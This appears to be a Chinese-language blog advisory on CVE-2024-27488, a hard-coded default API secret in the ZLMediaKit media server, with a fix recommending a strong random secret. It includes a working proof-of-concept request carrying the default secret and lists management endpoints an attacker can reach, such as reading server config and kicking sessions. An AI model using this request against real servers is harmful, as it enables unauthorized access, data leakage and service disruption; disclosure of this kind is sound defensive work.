CVE-2024-27488_ ZLMediaKit 安全漏洞

CVSS评分:9.8分

CVE-2024-27488_ ZLMediaKit 安全漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

CVE-2024-27488 是 ZLMediaKit 的"硬编码/默认 API 密钥"导致的访问控制缺陷 ------ ZLMediaKit 默认开启 HTTP 管理/控制 API,使用 secret 参数做认证,但默认/示例配置里有硬编码的 secret/示例 secret(或弱随机值),攻击者可利用这一点绕过认证,调用管理类 API(获取配置、会话、控制流、删除/添加代理、kick 等),实现信息泄露或权限滥用。

漏洞参考链接:

硬编码的地址:https://docs.zlmediakit.com/guide/media_server/config_file.html

漏洞验证 poc:

xml 复制代码
GET /index/?secret=035c73f7-bb6b-4889-a715-d9eb2d1925cc

请求的响应类似于:

json 复制代码
{
  "code" : 0,
  "data" : [
    "/index/",
    "/index/api/addFFmpegSource",
    "/index/api/addStreamProxy",
    "/index/api/addStreamPusherProxy",
    "/index/api/closeRtpServer",
    ...
  ]
}

2. 漏洞危害

该漏洞利用难度极低,通过未授权调用 api 接口,可实现一些未授权的操作,例如:

  • /index/api/getServerConfig --- 获取服务配置(可能泄露路径、密钥等)
  • /index/api/getMediaList --- 当前流列表与来源信息
  • /index/api/getAllSession --- 会话/连接详情
  • /index/api/kick_session --- 踢掉会话(验证时请勿滥用)

3. 漏洞修复

conf/config.ini 或运行参数中明确设置强随机 secret(足够长度,字母+数字+符号),并且不要使用示例/默认值 035c73f7-bb6b-4889-a715-d9eb2d1925cc

相关推荐
能年玲奈喝榴莲牛奶12 小时前
安全服务-应急响应
web安全·网络安全·应急响应·安全服务
小快说网安14 小时前
硬核解析:高防 IP 是如何拦截 DDoS 攻击的?从清洗中心到流量调度
网络·tcp/ip·网络安全·ddos
NewCarRen18 小时前
安全碰撞测试:汽车车载IT组件的实际安全评估
网络·网络安全
汤愈韬19 小时前
防火墙双机热备01(主备模式)
网络·网络协议·网络安全·security·huawei
Whoami!20 小时前
❿⁄₁₀ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 获取并破解NTLM哈希
网络安全·信息安全·密码破解·mimikatz·ntlm哈希
半路_出家ren20 小时前
20.基于Selenium实现界面自动化控制
运维·python·selenium·测试工具·网络安全·自动化·chromedriver
计算机毕业设计指导20 小时前
恶意网址检测系统
python·web安全·网络安全·系统安全
云安全干货局1 天前
服务器被攻击后如何快速恢复?数据备份 + 应急响应手册
网络·网络安全·云服务器·弹性云服务器
simon_skywalker1 天前
软考 信息安全笔记(一)
网络安全
汤愈韬2 天前
防火墙双机热备技术之VRRP
网络·网络协议·网络安全·security·huawei